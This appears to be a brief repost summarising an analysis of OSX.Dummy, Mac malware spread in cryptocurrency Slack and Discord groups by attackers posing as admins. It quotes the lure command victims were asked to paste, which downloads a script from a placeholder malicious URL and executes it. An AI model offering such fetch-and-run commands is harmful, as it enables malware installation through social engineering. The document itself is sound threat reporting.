OSX.Dummy - new Mac malware targets the cryptocurrency community

In Summary :

Remco Verhoef states the malware attacks are:

"originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.

Apparently attackers are asking users to infect themselves, via the following command:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

If users fall for this (rather lame social engineering trick, a rather massive machO binary will be downloaded and executed.
Massive you say? Yes, it clocks in at 34M:

$ du -h /tmp/script 34M script

Using WhatsYourSign, we can see that the malicious binary is not signed: [...]

kindly refer the following link as follow up :
https://ift.tt/2lNE7oX